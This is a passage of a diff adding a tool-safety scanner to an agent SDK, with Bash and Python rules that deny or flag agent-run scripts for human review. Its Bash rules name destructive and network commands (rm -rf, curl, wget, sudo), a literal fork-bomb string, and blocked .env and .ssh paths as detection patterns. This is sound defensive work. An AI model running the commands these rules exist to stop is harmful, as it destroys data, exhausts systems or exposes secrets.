value.items() + } + if isinstance(value, list): + return [_desensitize_value(item) for item in value] + if isinstance(value, tuple): + return [_desensitize_value(item) for item in value] + if isinstance(value, str): + return _desensitize_string(value) + return value + + +def _is_sensitive_key(key: str) -> bool: + lowered = key.lower() + return any(sensitive_key in lowered for sensitive_key in _SENSITIVE_KEYS) + + +def _desensitize_string(value: str) -> str: + if len(value) <= 256: + return value + return f"{value[:128]}..." + + +def _utc_now() -> str: + return datetime.now(timezone.utc).isoformat() + + +def monotonic_ms(start: Optional[float] = None) -> float: + """Return monotonic milliseconds since start, or current monotonic milliseconds.""" + now = time.monotonic() * 1000 + if start is None: + return now + return now - start diff --git a/trpc_agent_sdk/tools/safety/bash_scanner.py b/trpc_agent_sdk/tools/safety/bash_scanner.py new file mode 100644 index 00000000..e1d93feb --- /dev/null +++ b/trpc_agent_sdk/tools/safety/bash_scanner.py @@ -0,0 +1,422 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. 
+"""Pattern-based Bash safety scanner rules.""" + +from __future__ import annotations + +import re +import shlex +from math import inf +from typing import List +from typing import Optional + +from .checker import Rule +from .checker import SafetyChecker +from .models import Finding +from .models import SafetyResult +from .models import SafetySeverity +from .models import ToolExecutionRequest +from .policy import SafetyPolicy + +_BASH_LANGUAGES = {"bash", "sh", "shell", "zsh"} +_LONG_SLEEP_SECONDS = 3600 + + +class BashLine: + """One source line plus shell tokens.""" + + def __init__(self, number: int, text: str): + self.number = number + self.text = text + self.tokens = _split_shell_tokens(text) + + +class BashScanContext: + """Tokenized Bash source.""" + + def __init__(self, source: str): + self.source = source + self.lines = [BashLine(number, text) for number, text in enumerate(source.splitlines(), start=1)] + + +class BashRule(Rule): + """Base class for pattern-backed Bash rules.""" + + severity = SafetySeverity.HIGH + + async def check(self, request: ToolExecutionRequest, policy: SafetyPolicy) -> List[Finding]: + source = _extract_bash_source(request) + if not source: + return [] + return self.check_script(BashScanContext(source), policy) + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + """Check Bash source and return findings.""" + raise NotImplementedError + + def _finding(self, message: str, line: BashLine, policy: SafetyPolicy, target: str = "") -> Finding: + column = line.text.find(target) if target else -1 + return Finding( + rule_id=self.rule_id, + message=message, + severity=policy.rule_severity(self.rule_id, self.severity), + target=target, + metadata={ + "line": line.number, + "column": max(column, 0), + }, + ) + + +class RmRfRule(BashRule): + """Detect rm -rf style deletion.""" + + @property + def rule_id(self) -> str: + return "bash.rm_rf" + + def check_script(self, context: BashScanContext, policy: 
SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + for index, token in enumerate(line.tokens): + command = _command_name(token) + if command != "rm" or policy.is_command_allowed(self.rule_id, command): + continue + flags = _collect_short_flags(line.tokens[index + 1:]) + if "r" in flags and "f" in flags: + findings.append(self._finding("Bash code calls rm -rf.", line, policy, "rm")) + break + return findings + + +class CurlRule(BashRule): + """Detect curl calls.""" + + @property + def rule_id(self) -> str: + return "bash.curl" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + return _command_findings(self, context, policy, {"curl"}, "Bash code calls curl.") + + +class WgetRule(BashRule): + """Detect wget calls.""" + + @property + def rule_id(self) -> str: + return "bash.wget" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + return _command_findings(self, context, policy, {"wget"}, "Bash code calls wget.") + + +class SudoRule(BashRule): + """Detect sudo calls.""" + + @property + def rule_id(self) -> str: + return "bash.sudo" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + return _command_findings(self, context, policy, {"sudo"}, "Bash code calls sudo.") + + +class AptInstallRule(BashRule): + """Detect apt install calls.""" + + @property + def rule_id(self) -> str: + return "bash.apt_install" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + command = _install_command(line.tokens, {"apt", "apt-get"}) + if command and not policy.is_command_allowed(self.rule_id, command): + findings.append(self._finding("Bash code calls apt install.", line, policy, command)) + return findings + + +class PipInstallRule(BashRule): + """Detect pip install calls.""" + + @property + def rule_id(self) -> str: + 
return "bash.pip_install" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + command = _install_command(line.tokens, {"pip", "pip3"}) or _python_module_pip_command(line.tokens) + if command and not policy.is_command_allowed(self.rule_id, command): + findings.append(self._finding("Bash code calls pip install.", line, policy, command)) + return findings + + +class NpmInstallRule(BashRule): + """Detect npm install calls.""" + + @property + def rule_id(self) -> str: + return "bash.npm_install" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + command = _install_command(line.tokens, {"npm"}) + if command and not policy.is_command_allowed(self.rule_id, command): + findings.append(self._finding("Bash code calls npm install.", line, policy, command)) + return findings + + +class BackgroundExecutionRule(BashRule): + """Detect background execution with &.""" + + @property + def rule_id(self) -> str: + return "bash.background_execution" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + if _has_background_operator(line.text): + findings.append(self._finding("Bash code uses background execution.", line, policy, "&")) + return findings + + +class ShellPipeRule(BashRule): + """Detect shell pipes.""" + + @property + def rule_id(self) -> str: + return "bash.shell_pipe" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + if _has_pipe_operator(line.text): + findings.append(self._finding("Bash code uses a shell pipe.", line, policy, "|")) + return findings + + +class ForkBombRule(BashRule): + """Detect common fork bomb patterns.""" + + @property + def rule_id(self) -> str: + 
return "bash.fork_bomb" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + if _is_fork_bomb(line.text): + findings.append( + self._finding("Bash code contains a fork bomb pattern.", line, policy, line.text.strip())) + return findings + + +class LongSleepRule(BashRule): + """Detect long sleep calls.""" + + @property + def rule_id(self) -> str: + return "bash.long_sleep" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + max_timeout = policy.rule_max_timeout(self.rule_id, _LONG_SLEEP_SECONDS) + for line in context.lines: + for index, token in enumerate(line.tokens): + if _command_name(token) != "sleep" or index + 1 >= len(line.tokens): + continue + seconds = _sleep_seconds(line.tokens[index + 1]) + if seconds >= max_timeout: + findings.append(self._finding("Bash code calls sleep for a long duration.", line, policy, "sleep")) + break + return findings + + +class BashScanner: + """Convenience scanner using the default Bash safety rules.""" + + def __init__(self, rules: Optional[list[Rule]] = None, policy: Optional[SafetyPolicy] = None): + self._checker = SafetyChecker(rules or create_bash_rules(), policy) + + async def scan(self, source: str, policy: Optional[SafetyPolicy] = None) -> SafetyResult: + """Scan Bash source and return a safety result.""" + request = ToolExecutionRequest(language="bash", script=source) + return await self._checker.check(request, policy) + + +def create_bash_rules() -> list[Rule]: + """Create the built-in Bash pattern safety rules.""" + return [ + RmRfRule(), + CurlRule(), + WgetRule(), + SudoRule(), + AptInstallRule(), + PipInstallRule(), + NpmInstallRule(), + BackgroundExecutionRule(), + ShellPipeRule(), + ForkBombRule(), + LongSleepRule(), + ] + + +def _extract_bash_source(request: ToolExecutionRequest) -> str: + language = (request.language or 
request.metadata.get("language") or "").strip().lower() + if language and language not in _BASH_LANGUAGES: + return "" + for value in ( + request.script, + request.args.get("code"), + request.args.get("script"), + request.metadata.get("code"), + request.metadata.get("script"), + request.metadata.get("bash_code"), + ): + if isinstance(value, str) and value.strip(): + return value + return "" + + +def _split_shell_tokens(line: str) -> list[str]: + lexer = shlex.shlex(line, posix=True, punctuation_chars=True) + lexer.whitespace_split = True + lexer.commenters = "#" + try: + return list(lexer) + except ValueError: + return line.split() + + +def _command_name(token: str) -> str: + return token.rsplit("/", 1)[-1] + + +def _command_findings( + rule: BashRule, + context: BashScanContext, + policy: SafetyPolicy, + names: set[str], + message: str, +) -> list[Finding]: + findings: list[Finding] = [] + for line in context.lines: + for token in line.tokens: + command = _command_name(token) + if command in names and not policy.is_command_allowed(rule.rule_id, command): + findings.append(rule._finding(message, line, policy, command)) + break + return findings + + +def _collect_short_flags(tokens: list[str]) -> set[str]: + flags: set[str] = set() + for token in tokens: + if token in {"|", "&", "&&", "||", ";"}: + break + if not token.startswith("-") or token == "-": + continue + flags.update(token.lstrip("-")) + return flags + + +def _install_command(tokens: list[str], command_names: set[str]) -> str: + for index, token in enumerate(tokens): + command = _command_name(token) + if command not in command_names: + continue + for candidate in tokens[index + 1:]: + if candidate in {"|", "&", "&&", "||", ";"}: + break + if candidate.startswith("-"): + continue + if candidate == "install": + return command + break + return "" + + +def _python_module_pip_command(tokens: list[str]) -> str: + for index, token in enumerate(tokens): + command = _command_name(token) + if command not in 
{"python", "python3"}: + continue + window = tokens[index + 1:index + 4] + if len(window) >= 3 and window[0] == "-m" and window[1] == "pip" and window[2] == "install": + return "pip" + return "" + + +def _has_background_operator(line: str) -> bool: + for index in _operator_positions(line, "&"): + before = line[index - 1] if index > 0 else "" + after = line[index + 1] if index + 1 < len(line) else "" + if before not in {"&", ">", "<", "|"} and after not in {"&", ">"}:  # skip &&, >&, <&, |&, &> + return True + return False + + +def _has_pipe_operator(line: str) -> bool: + for index in _operator_positions(line, "|"): + before = line[index - 1] if index > 0 else "" + after = line[index + 1] if index + 1 < len(line) else "" + if before != "|" and after != "|": + return True + return False + + +def _operator_positions(line: str, operator: str) -> list[int]: + positions: list[int] = [] + quote = "" + escaped = False + for index, char in enumerate(line): + if escaped: + escaped = False + continue + if char == "\\": + escaped = True + continue + if quote: + if char == quote: + quote = "" + continue + if char in {"'", '"'}: + quote = char + continue + if char == "#": + break + if char == operator: + positions.append(index) + return positions + + +def _is_fork_bomb(line: str) -> bool: + compact = "".join(line.split()) + if ":(){:|:&};:" in compact: + return True + return bool(re.search(r"([A-Za-z_:][A-Za-z0-9_:]*)\(\)\{\1\|\1&};\1", compact)) + + +def _sleep_seconds(value: str) -> float: + if value.lower() in {"inf", "infinity"}: + return inf + match = re.fullmatch(r"(\d+(?:\.\d+)?)([smhd]?)", value.lower()) + if not match: + return 0 + amount = float(match.group(1)) + unit = match.group(2) or "s" + scale = { + "s": 1, + "m": 60, + "h": 3600, + "d": 86400, + }[unit] + return amount * scale diff --git a/trpc_agent_sdk/tools/safety/checker.py b/trpc_agent_sdk/tools/safety/checker.py new file mode 100644 index 00000000..311b34a0 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/checker.py @@ -0,0 +1,88 @@ +# Tencent is
pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Checker framework for tool script safety checks.""" + +from __future__ import annotations + +from abc import ABC +from abc import abstractmethod +from typing import Iterable +from typing import List +from typing import Optional + +from .decision import DecisionEngine +from .models import Finding +from .models import SafetyDecision +from .models import SafetyResult +from .models import ToolExecutionRequest +from .policy import PolicyLoader +from .policy import SafetyPolicy + + +class Rule(ABC): + """Abstract interface for a safety rule.""" + + @property + @abstractmethod + def rule_id(self) -> str: + """Unique rule identifier.""" + + @abstractmethod + async def check(self, request: ToolExecutionRequest, policy: SafetyPolicy) -> List[Finding]: + """Check a request and return findings.""" + + +class SafetyChecker: + """Run enabled safety rules and turn findings into a decision.""" + + def __init__( + self, + rules: Optional[Iterable[Rule]] = None, + policy: Optional[SafetyPolicy] = None, + decision_engine: Optional[DecisionEngine] = None, + ): + self._rules: list[Rule] = list(rules or []) + self._policy = policy or PolicyLoader.from_env() + self._decision_engine = decision_engine or DecisionEngine() + + @property + def rules(self) -> list[Rule]: + """Return registered rules.""" + return self._rules + + @property + def policy(self) -> SafetyPolicy: + """Return the default policy.""" + return self._policy + + @property + def decision_engine(self) -> DecisionEngine: + """Return the decision engine.""" + return self._decision_engine + + def add_rule(self, rule: Rule) -> None: + """Register one rule.""" + self._rules.append(rule) + + async def check( + self, + request: ToolExecutionRequest, + policy: Optional[SafetyPolicy] = None, + ) -> SafetyResult: + """Run enabled rules 
against a request.""" + active_policy = policy or self._policy + if not active_policy.enabled: + return SafetyResult(decision=SafetyDecision.ALLOW, request=request) + + findings: list[Finding] = [] + for rule in self._rules: + if not active_policy.is_rule_enabled(rule.rule_id): + continue + rule_findings = await rule.check(request, active_policy) + findings.extend(rule_findings or []) + + decision = self._decision_engine.decide(findings, active_policy) + return SafetyResult(decision=decision, findings=findings, request=request) diff --git a/trpc_agent_sdk/tools/safety/decision.py b/trpc_agent_sdk/tools/safety/decision.py new file mode 100644 index 00000000..ea3babbe --- /dev/null +++ b/trpc_agent_sdk/tools/safety/decision.py @@ -0,0 +1,40 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Decision engine for tool script safety findings.""" + +from __future__ import annotations + +from .models import Finding +from .models import SafetyDecision +from .models import SafetySeverity +from .policy import SafetyPolicy + + +class DecisionEngine: + """Turn safety findings into an execution decision.""" + + def decide(self, findings: list[Finding], policy: SafetyPolicy) -> SafetyDecision: + """Generate a decision from findings and policy thresholds.""" + if not findings: + return SafetyDecision.ALLOW + + deny_severities = set(policy.deny_severities or _default_deny_severities()) + if any(finding.severity in deny_severities for finding in findings): + return SafetyDecision.DENY + + review_severities = set(policy.review_severities or _default_review_severities()) + if any(finding.severity in review_severities for finding in findings): + return SafetyDecision.NEEDS_HUMAN_REVIEW + + return policy.default_decision + + +def _default_deny_severities() -> list[SafetySeverity]: + return [SafetySeverity.HIGH, 
SafetySeverity.CRITICAL] + + +def _default_review_severities() -> list[SafetySeverity]: + return [SafetySeverity.MEDIUM] diff --git a/trpc_agent_sdk/tools/safety/filter.py b/trpc_agent_sdk/tools/safety/filter.py new file mode 100644 index 00000000..7811ed86 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/filter.py @@ -0,0 +1,145 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Tool filter that applies safety checks before tool execution.""" + +from __future__ import annotations + +from typing import Any +from typing import Optional + +from trpc_agent_sdk.abc import FilterResult +from trpc_agent_sdk.context import AgentContext +from trpc_agent_sdk.context import get_invocation_ctx +from trpc_agent_sdk.filter import BaseFilter +from trpc_agent_sdk.filter import FilterType +from trpc_agent_sdk.tools._context_var import get_tool_var + +from .audit import SafetyAuditLogger +from .audit import monotonic_ms +from .bash_scanner import create_bash_rules +from .checker import SafetyChecker +from .models import SafetyDecision +from .models import SafetyResult +from .models import ToolExecutionRequest +from .policy import SafetyPolicy +from .python_scanner import create_python_rules +from .report import SafetyReportWriter +from .telemetry import record_safety_attributes + +_SCRIPT_ARG_KEYS = ("script", "code", "command", "cmd", "python_code", "bash_code") +_LANGUAGE_ARG_KEYS = ("language", "lang") +_PYTHON_TOOL_HINTS = ("python", ) +_BASH_TOOL_HINTS = ("bash", "shell", "sh") + + +class ToolSafetyFilter(BaseFilter): + """Run the tool safety checker before executing a tool.""" + + def __init__( + self, + checker: Optional[SafetyChecker] = None, + policy: Optional[SafetyPolicy] = None, + audit_logger: Optional[SafetyAuditLogger] = None, + report_writer: Optional[SafetyReportWriter] = None, + ): + super().__init__() + 
self._type = FilterType.TOOL + self._name = "tool_safety" + self._checker = checker or SafetyChecker(rules=create_python_rules() + create_bash_rules(), policy=policy) + self._policy = policy + self._audit_logger = audit_logger or SafetyAuditLogger() + self._report_writer = report_writer or SafetyReportWriter() + + async def _before(self, ctx: AgentContext, req: Any, rsp: FilterResult): + """Run safety checks before the actual tool implementation.""" + request = _build_tool_execution_request(req) + start_ms = monotonic_ms() + result = await self._checker.check(request, self._policy) + self._audit_logger.write(result, monotonic_ms(start_ms)) + self._report_writer.write(result) + record_safety_attributes(result) + + if result.decision == SafetyDecision.ALLOW: + return + + rsp.rsp = _safety_response(result) + rsp.is_continue = False + rsp.error = None + + +def _build_tool_execution_request(args: Any) -> ToolExecutionRequest: + invocation_ctx = get_invocation_ctx() + tool = get_tool_var() + tool_name = getattr(tool, "name", "") + safe_args = args if isinstance(args, dict) else {} + language = _extract_language(tool_name, safe_args) + script = _extract_script(safe_args) + return ToolExecutionRequest( + tool_name=tool_name, + args=safe_args, + language=language, + script=script, + agent_name=getattr(invocation_ctx, "agent_name", ""), + invocation_id=getattr(invocation_ctx, "invocation_id", ""), + function_call_id=getattr(invocation_ctx, "function_call_id", "") or "", + metadata={ + "filter": "tool_safety", + }, + ) + + +def _extract_script(args: dict[str, Any]) -> str: + for key in _SCRIPT_ARG_KEYS: + value = args.get(key) + if isinstance(value, str) and value.strip(): + return value + return "" + + +def _extract_language(tool_name: str, args: dict[str, Any]) -> str: + for key in _LANGUAGE_ARG_KEYS: + value = args.get(key) + if isinstance(value, str) and value.strip(): + return value.strip().lower() + + lowered_tool_name = tool_name.lower() + if any(hint in 
lowered_tool_name for hint in _PYTHON_TOOL_HINTS): + return "python" + if any(hint in lowered_tool_name for hint in _BASH_TOOL_HINTS): + return "bash" + if isinstance(args.get("python_code"), str): + return "python" + if isinstance(args.get("bash_code"), str): + return "bash" + return "" + + +def _safety_response(result: SafetyResult) -> dict[str, Any]: + response = { + "status": "blocked" if result.decision == SafetyDecision.DENY else "needs_human_review", + "decision": result.decision.value, + "message": _decision_message(result), + "findings": [_finding_dict(finding) for finding in result.findings], + } + if result.decision == SafetyDecision.NEEDS_HUMAN_REVIEW: + response["human_review_required"] = True + return response + + +def _decision_message(result: SafetyResult) -> str: + if result.decision == SafetyDecision.DENY: + return "Tool execution was denied by the safety policy." + return "Tool execution requires human review before it can continue." + + +def _finding_dict(finding) -> dict[str, Any]: + return { + "rule_id": finding.rule_id, + "message": finding.message, + "severity": finding.severity.value, + "target": finding.target, + "metadata": finding.metadata, + } diff --git a/trpc_agent_sdk/tools/safety/models.py b/trpc_agent_sdk/tools/safety/models.py new file mode 100644 index 00000000..c329f781 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/models.py @@ -0,0 +1,72 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. 
+"""Data models for tool script safety checks.""" + +from __future__ import annotations + +from enum import Enum +from typing import Any +from typing import Dict +from typing import List +from typing import Optional + +from pydantic import BaseModel +from pydantic import Field + + +class SafetyDecision(str, Enum): + """Final decision from a safety check.""" + + ALLOW = "allow" + DENY = "deny" + NEEDS_HUMAN_REVIEW = "needs_human_review" + + +class SafetySeverity(str, Enum): + """Severity of a safety finding.""" + + INFO = "info" + LOW = "low" + MEDIUM = "medium" + HIGH = "high" + CRITICAL = "critical" + + +class ToolExecutionRequest(BaseModel): + """Input passed to safety rules before a tool execution.""" + + tool_name: str = Field(default="", description="Name of the tool being executed.") + args: Dict[str, Any] = Field(default_factory=dict, description="Tool arguments.") + language: str = Field(default="", description="Script language when known.") + script: str = Field(default="", description="Script source to scan when available.") + agent_name: str = Field(default="", description="Name of the current agent.") + invocation_id: str = Field(default="", description="Current invocation id.") + function_call_id: str = Field(default="", description="Current function call id.") + metadata: Dict[str, Any] = Field(default_factory=dict, description="Extension metadata.") + + +class Finding(BaseModel): + """A single issue reported by a safety rule.""" + + rule_id: str = Field(description="Identifier of the rule that produced this finding.") + message: str = Field(description="Human-readable finding message.") + severity: SafetySeverity = Field(default=SafetySeverity.MEDIUM, description="Finding severity.") + target: str = Field(default="", description="Optional target such as an argument path or code block id.") + metadata: Dict[str, Any] = Field(default_factory=dict, description="Rule-specific metadata.") + + +class SafetyResult(BaseModel): + """Result returned by the 
checker for one tool execution request.""" + + decision: SafetyDecision = Field(default=SafetyDecision.ALLOW, description="Final safety decision.") + findings: List[Finding] = Field(default_factory=list, description="Findings produced by enabled rules.") + request: Optional[ToolExecutionRequest] = Field(default=None, description="Request that was checked.") + metadata: Dict[str, Any] = Field(default_factory=dict, description="Checker-specific metadata.") + + @property + def allowed(self) -> bool: + """Return whether execution should continue.""" + return self.decision == SafetyDecision.ALLOW diff --git a/trpc_agent_sdk/tools/safety/policy.py b/trpc_agent_sdk/tools/safety/policy.py new file mode 100644 index 00000000..c36db503 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/policy.py @@ -0,0 +1,247 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. 
+"""Policy loading for tool script safety checks.""" + +from __future__ import annotations + +import json +import os +from pathlib import Path +from typing import Any +from typing import Dict +from typing import List +from typing import Optional +from urllib.parse import urlparse + +import yaml +from pydantic import BaseModel +from pydantic import Field + +from .models import SafetyDecision +from .models import SafetySeverity + +SAFETY_POLICY_ENV = "TRPC_AGENT_TOOL_SAFETY_POLICY" +DEFAULT_POLICY_FILE = Path(__file__).with_name("tool_safety_policy.yaml") + + +class SafetyPolicy(BaseModel): + """Configuration used by the safety checker.""" + + enabled: bool = Field(default=True, description="Whether safety checks are enabled.") + default_decision: SafetyDecision = Field( + default=SafetyDecision.ALLOW, + description="Decision used when findings do not match deny/review thresholds.", + ) + deny_severities: List[SafetySeverity] = Field( + default_factory=lambda: [SafetySeverity.HIGH, SafetySeverity.CRITICAL], + description="Finding severities that produce a deny decision.", + ) + review_severities: List[SafetySeverity] = Field( + default_factory=lambda: [SafetySeverity.MEDIUM], + description="Finding severities that require human review.", + ) + enabled_rules: List[str] = Field( + default_factory=list, + description="If set, only these rule ids are enabled.", + ) + disabled_rules: List[str] = Field(default_factory=list, description="Rule ids to disable.") + allowed_domains: List[str] = Field(default_factory=list, description="Domains allowed for network access rules.") + blocked_paths: List[str] = Field(default_factory=list, description="Paths blocked for filesystem rules.") + allowed_commands: List[str] = Field(default_factory=list, description="Commands allowed for command rules.") + max_timeout: Optional[float] = Field(default=None, description="Maximum allowed timeout in seconds.") + max_output_size: Optional[int] = Field(default=None, description="Maximum allowed 
output size in bytes.") + severity: Dict[str, Any] = Field(default_factory=dict, description="Default and per-rule severities.") + rule_configs: Dict[str, Dict[str, Any]] = Field(default_factory=dict, description="Per-rule configuration.") + metadata: Dict[str, Any] = Field(default_factory=dict, description="Extension metadata.") + + def is_rule_enabled(self, rule_id: str) -> bool: + """Return whether a rule should run under this policy.""" + if not self.enabled: + return False + if rule_id in self.disabled_rules: + return False + if self.enabled_rules and rule_id not in self.enabled_rules: + return False + return True + + def rule_config(self, rule_id: str) -> Dict[str, Any]: + """Return the configuration for one rule.""" + return self.rule_configs.get(rule_id, {}) + + def rule_value(self, rule_id: str, key: str, default: Any = None) -> Any: + """Return a per-rule value, falling back to the global policy value.""" + config = self.rule_config(rule_id) + if key in config: + return config[key] + return getattr(self, key, default) + + def rule_list(self, rule_id: str, key: str) -> List[str]: + """Return a string list from per-rule or global policy config.""" + return _as_string_list(self.rule_value(rule_id, key, [])) + + def rule_severity(self, rule_id: str, default: SafetySeverity = SafetySeverity.MEDIUM) -> SafetySeverity: + """Return the configured severity for one rule.""" + config = self.rule_config(rule_id) + value = config.get("severity") + if value is None: + value = self.severity.get(rule_id) or self.severity.get("default") + return _to_severity(value, default) + + def is_command_allowed(self, rule_id: str, command: str) -> bool: + """Return whether a command is explicitly allowed for a rule.""" + command = _normalize_command(command) + if not command: + return False + allowed_commands = self.rule_list(rule_id, "allowed_commands") + return any(_command_matches(command, allowed) for allowed in allowed_commands) + + def is_domain_allowed(self, rule_id: str, 
domain: str) -> bool: + """Return whether a domain is explicitly allowed for a rule.""" + domain = _normalize_domain(domain) + if not domain: + return False + allowed_domains = self.rule_list(rule_id, "allowed_domains") + return any(_domain_matches(domain, allowed) for allowed in allowed_domains) + + def is_path_blocked(self, rule_id: str, path: str) -> bool: + """Return whether a path is blocked for a rule.""" + if not path: + return False + blocked_paths = self.rule_list(rule_id, "blocked_paths") + return any(_path_matches(path, pattern) for pattern in blocked_paths) + + def rule_max_timeout(self, rule_id: str, default: float) -> float: + """Return the configured max timeout for one rule.""" + value = self.rule_value(rule_id, "max_timeout", default) + try: + return float(value) + except (TypeError, ValueError): + return default + + def rule_max_output_size(self, rule_id: str, default: Optional[int] = None) -> Optional[int]: + """Return the configured max output size for one rule, or ``default`` when unset.""" + value = self.rule_value(rule_id, "max_output_size", default) + if value is None: + return default  # the global field defaults to None, so fall back like rule_max_timeout does + try: + return int(value) + except (TypeError, ValueError): + return default + + +class PolicyLoader: + """Load :class:`SafetyPolicy` from dictionaries, files, or environment.""" + + @staticmethod + def from_dict(data: Optional[Dict[str, Any]]) -> SafetyPolicy: + """Create a policy from a dictionary.""" + return SafetyPolicy.model_validate(_normalize_policy_data(data or {})) + + @staticmethod + def from_default_file() -> SafetyPolicy: + """Load the bundled default policy file.""" + if not DEFAULT_POLICY_FILE.exists(): + return SafetyPolicy() + return PolicyLoader.from_file(DEFAULT_POLICY_FILE) + + @staticmethod + def from_file(path: str | Path) -> SafetyPolicy: + """Load a policy from a JSON or YAML file.""" + policy_path = Path(path) + with policy_path.open("r", encoding="utf-8") as fp: + if policy_path.suffix.lower() in {".yaml", ".yml"}: + data = yaml.safe_load(fp) or {} + else: + data
= json.load(fp) + return PolicyLoader.from_dict(data) + + @staticmethod + def from_env(env_var: str = SAFETY_POLICY_ENV) -> SafetyPolicy: + """Load a policy from an environment variable pointing to a policy file.""" + path = os.environ.get(env_var, "").strip() + if not path: + return PolicyLoader.from_default_file() + return PolicyLoader.from_file(path) + + +def _normalize_policy_data(data: Dict[str, Any]) -> Dict[str, Any]: + normalized = dict(data) + for key in ("deny_severities", "review_severities"): + if key in normalized: + normalized[key] = [_to_severity(value) for value in _as_list(normalized[key])] + return normalized + + +def _as_list(value: Any) -> list[Any]: + if value is None: + return [] + if isinstance(value, list): + return value + if isinstance(value, tuple): + return list(value) + if isinstance(value, set): + return list(value) + return [value] + + +def _as_string_list(value: Any) -> List[str]: + return [str(item) for item in _as_list(value) if str(item).strip()] + + +def _to_severity(value: Any, default: SafetySeverity = SafetySeverity.MEDIUM) -> SafetySeverity: + if isinstance(value, SafetySeverity): + return value + if isinstance(value, str): + try: + return SafetySeverity(value.lower()) + except ValueError: + return default + return default + + +def _normalize_command(command: str) -> str: + return command.strip().rsplit("/", 1)[-1] + + +def _command_matches(command: str, allowed: str) -> bool: + allowed = allowed.strip() + if allowed == "*": + return True + return command == _normalize_command(allowed) or command == allowed + + +def _normalize_domain(domain: str) -> str: + value = domain.strip().lower() + if "://" in value: + value = urlparse(value).hostname or "" + return value.strip(".") + + +def _domain_matches(domain: str, allowed: str) -> bool: + allowed_domain = _normalize_domain(allowed) + if allowed_domain == "*": + return True + return domain == allowed_domain or domain.endswith(f".{allowed_domain}") + + +def _path_matches(path: str, 
pattern: str) -> bool: + normalized_path = _normalize_path(path) + normalized_pattern = _normalize_path(pattern) + if normalized_pattern == "*": + return True + if not normalized_pattern: + return False + if normalized_pattern in {".env", ".ssh"}: + return normalized_pattern in _path_parts(normalized_path) + return normalized_path == normalized_pattern or normalized_path.startswith(f"{normalized_pattern.rstrip('/')}/") + + +def _normalize_path(path: str) -> str: + return path.strip().replace("\\", "/").rstrip("/") + + +def _path_parts(path: str) -> list[str]: + return [part for part in path.split("/") if part] diff --git a/trpc_agent_sdk/tools/safety/python_scanner.py b/trpc_agent_sdk/tools/safety/python_scanner.py new file mode 100644 index 00000000..bbc02b69 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/python_scanner.py @@ -0,0 +1,405 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""AST-based Python safety scanner rules.""" + +from __future__ import annotations + +import ast +from typing import List +from typing import Optional +from urllib.parse import urlparse + +from .checker import Rule +from .checker import SafetyChecker +from .models import Finding +from .models import SafetyResult +from .models import SafetySeverity +from .models import ToolExecutionRequest +from .policy import SafetyPolicy + +_PYTHON_LANGUAGES = {"python", "py", "python3", "tool_code"} + + +class PythonScanContext: + """Parsed Python source plus lightweight symbol information.""" + + def __init__(self, source: str, tree: ast.AST): + self.source = source + self.tree = tree + self.aliases = self._collect_aliases(tree) + self.socket_vars = self._collect_socket_vars(tree) + + @classmethod + def create(cls, source: str) -> Optional["PythonScanContext"]: + """Parse Python source. 
Return None when source is not valid Python.""" + try: + tree = ast.parse(source) + except SyntaxError: + return None + return cls(source, tree) + + @staticmethod + def _collect_aliases(tree: ast.AST) -> dict[str, str]: + aliases: dict[str, str] = {} + for node in ast.walk(tree): + if isinstance(node, ast.Import): + for item in node.names: + if item.asname: + aliases[item.asname] = item.name + else: + local = item.name.split(".")[0] + aliases[local] = local + elif isinstance(node, ast.ImportFrom) and node.module: + for item in node.names: + local = item.asname or item.name + aliases[local] = f"{node.module}.{item.name}" + return aliases + + def _collect_socket_vars(self, tree: ast.AST) -> set[str]: + socket_vars: set[str] = set() + for node in ast.walk(tree): + value = None + targets: list[ast.expr] = [] + if isinstance(node, ast.Assign): + value = node.value + targets = list(node.targets) + elif isinstance(node, ast.AnnAssign): + value = node.value + targets = [node.target] + if value is None or not self._is_socket_constructor(value): + continue + for target in targets: + if isinstance(target, ast.Name): + socket_vars.add(target.id) + return socket_vars + + def _is_socket_constructor(self, node: ast.AST) -> bool: + if not isinstance(node, ast.Call): + return False + return self.resolve_call_name(node.func) in {"socket.socket"} + + def 